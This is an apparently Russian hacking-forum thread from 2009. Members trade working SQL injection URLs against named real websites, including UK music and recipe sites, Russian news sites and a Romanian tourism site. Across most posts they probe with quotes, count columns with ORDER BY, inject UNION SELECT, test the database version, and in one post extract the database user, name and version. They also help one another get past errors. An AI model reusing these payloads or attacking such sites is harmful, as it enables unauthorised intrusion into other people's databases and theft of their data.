
06.03.2009, 12:33
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
фигасе
)
|
|
|

06.03.2009, 17:27
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
А аналоги под линуху есть?
Burp Suite, WebScarab
|
|
|

06.03.2009, 17:46
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
С нами:
9140897
Репутация:
90
|
|
Есть скуля======================================== ================
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1'
================================================== ==============
Слобцов 7......
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+7--
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+8--
================================================== ==============
Когда ввожу----- http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+union+select+1,2,3,4,5,6,7--
Всё равно пишит-------The used SELECT statements have a different number of columns
================================================== ==============
Что такое? Как это обойти?
================================================== ==============
P.S===== А так же http://www.higherhacknell.co.uk/recipes.php?id=-1' ! Нельзя перебрать с помощью ORDER BY(Редериктит сразу).....Что в таком случае возможно сделать?
Заранее спасибо! )) (Если где-то обсуждалось, то извините, не видел))))
================================================== ==============
================================================== ==============
|
|
|

06.03.2009, 17:51
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Код:
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=5--
Код:
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=4--
Код:
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=3--
3-тяя ветка, в ней union select непашет!
Последний раз редактировалось -m0rgan-; 06.03.2009 в 17:54..
|
|
|

06.03.2009, 18:06
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от -m0rgan-
3-тяя ветка, в ней union select непашет!
Мде
А мне кажется пятая
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+and+substring(version(),1,1)=5--+
+++AndreyDevil+++
Там двойной запрос
а вторая отлично перебирается, просто кавычку нужно ставить
http://www.higherhacknell.co.uk/recipes.php?id=-1'+union+select+1,2,concat_ws(0x3a,User(),Database (),Version()),4,5,6,7,8,9,0,11/*
|
|
|

06.03.2009, 19:34
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
С нами:
9330638
Репутация:
93
|
|
http://listok.ura.ru/photo/index.php?id=6'
есть скуля... вроде. но что то не так
http://www.vedomosti.ru/newsline/index.shtml?2009/03/05/738007'
поможете?)
Последний раз редактировалось VITАL; 06.03.2009 в 20:51..
|
|
|

06.03.2009, 20:17
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
VITАL
https://forum.antichat.ru/showpost.php?p=1152922&postcount=5810
Тебе по 2 раза нужно отвечать? 
|
|
|

06.03.2009, 20:43
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
С нами:
9330638
Репутация:
93
|
|
jokester
спасибо) не заметил... да там вижу нифига не получится.. а второй? хз... думаю тоже не выйдет
|
|
|

07.03.2009, 01:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64.html
Великий Jokester помоги, вроде вывод есть а не выводит.Спасибо заранее.
|
|
|

07.03.2009, 01:21
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку.
Пока только так вижу:
http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+and+substring(version(),1,1)=5.html
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|